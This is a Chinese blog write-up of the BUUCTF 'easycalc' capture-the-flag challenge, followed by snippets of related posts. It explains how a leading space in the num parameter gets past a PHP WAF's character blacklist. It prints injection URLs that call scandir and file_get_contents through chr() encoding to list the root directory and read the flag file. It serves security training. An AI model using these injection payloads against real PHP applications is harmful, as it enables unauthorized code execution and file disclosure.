buuctf easycalc

最新推荐文章于 2024-06-11 18:06:00 发布
最新推荐文章于 2024-06-11 18:06:00 发布
阅读量230 收藏 1
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/124950981
版权

查看源代码

发现有waf存在,以及一个url网址 ,访问一下calc.php

传入参数num,然后绕过过滤。不能出现' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'

php在解析查询字符串时会

1.删除空白符

2.将某些字符转换为下划线(包括空格)

利用这两个php函数

scandir():列出参数目录中的文件和目录
readfile():读取文件内容

传参的num里出现黑名单里面的就会报错

这里用空格隔开后,就是空格加num不在num的判断黑名单中。

http://node4.buuoj.cn:28320/calc.php?%20num=1;var_dump(scandir(chr(47)))

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

 

 

ANYOUZHEN
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf Easy calc
m0_63883187的博客
01-13 113
一个简单的命令执行题目,
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF---[RoarCTF 2019]Easy Calc1
2201_75556700的博客
03-05 582
用来读取f1agg里面的内容,最后print_r将内容输出。是“/”的ASCII编码。是将扫描结果打印出来。
BUUCTF——EasyCalc1
weixin_62248541的博客
11-25 192
BUUCTF——EasyCalc1
BUUCTF [RoarCTF 2019]Easy Calc1
最新发布
m0_74167420的博客
06-11 444
(3) 由于num被过滤, 因此根据php解析规则,可以将(num)改写为( num),waf在过滤时不会发现num,但是php在解析时" num"和"num"无区别,这样就可以传入查寻字符串了。(6) 又由于scandir("/")扫描后是以数组的形式输出,所以要利用var_dump() 或者 print_r()来对内容进行输出。num=scandir(chr(47)),利用" / "该符号的ASCII来进行转化。(4) 可以通过scandir("/")来扫描整个根目录,scandir()函数相关知识。
buuctf最近刷题
zzqzzq11的博客
08-07 932
buuctf一些刷题
BUUCTF-Easy Calc
m0_62094846的博客
12-19 365
一个计算的工具 查看源代码,有WAF 还有url calc.php 输入数字可以,但是输入字母就会出问题 加了空格就可以成功 试过ls,不行 用scandir()函数读取文件夹里的文件,再输入print_r(print printf也可以)输出 print_r PHP中的打印函数 PHP打印输出函数汇总-php教程-PHP中文网 scandir() 函数返回指定目录中的文件和目录的数组 但是/被过滤了,用url编码也读不出来,就试着<chr...
buuctf [RoarCTF 2019]Easy Calc
m0_65766842的博客
04-09 365
1
BUUCTF Easy Calc
qq_43622442的博客
04-12 1102
BUUCTF Easy Calc = = 1.打开网站,让我们算术: 2.看到框框肯定要插一下: 3.拦截了,猜测后端应该是直接对语句执行了输出的,看看源码: 4.说是有waf,而且之前插入抓包的时候也发现了/calc.php?num= 5.= =可我真没想到,不加参数的话会直接显示源码的,做题和实战有偏差= = 这里就是设置了黑名单,然后代码执行。看到这儿就想到了一句话,但是 “ ...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc
weixin_44622228的博客
04-17 394
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc 进入靶场,发现只有一个计算器的页面, 输入1+2看看,返回了答案3 常规想法,输入单引号试试,弹出了一个窗口 经过多个字符测试,发现都会导致弹窗,这时候我们看看F12看看, 有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 注释下还有一段js代码,通过代码可以发现还有个calc.php页面,于是...
BUUCTF(web刷题记录一)
nareku的博客
04-16 8708
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
Buuctf(Easy Calc 1)
m0_64444909的博客
04-14 2886
一、解题步骤 (1)发现了一个可以得到计算结果的输入框,说明这题应该是一道注入题,或者注入类似的题目,我们输几个数字发现可以得到正确答案,但输入字母就会报错。我们看一下html源码,发现 calc.php?num=encodeURIComponent($("#content").val()) (2)我们访问 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt impo
BUUCTF [RoarCTF 2019]Easy Calc
qq_53030229的博客
11-09 817
文章目录一、 [RoarCTF 2019]Easy Calc1、检查源码2、利用PHP的字符串解析绕过 一、 [RoarCTF 2019]Easy Calc 1、检查源码        1、当拿到题目时,本人以为是使用Linux命令获取flag,但是尝试之后不行        2、检查源码,发现了calc.php,打开     
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值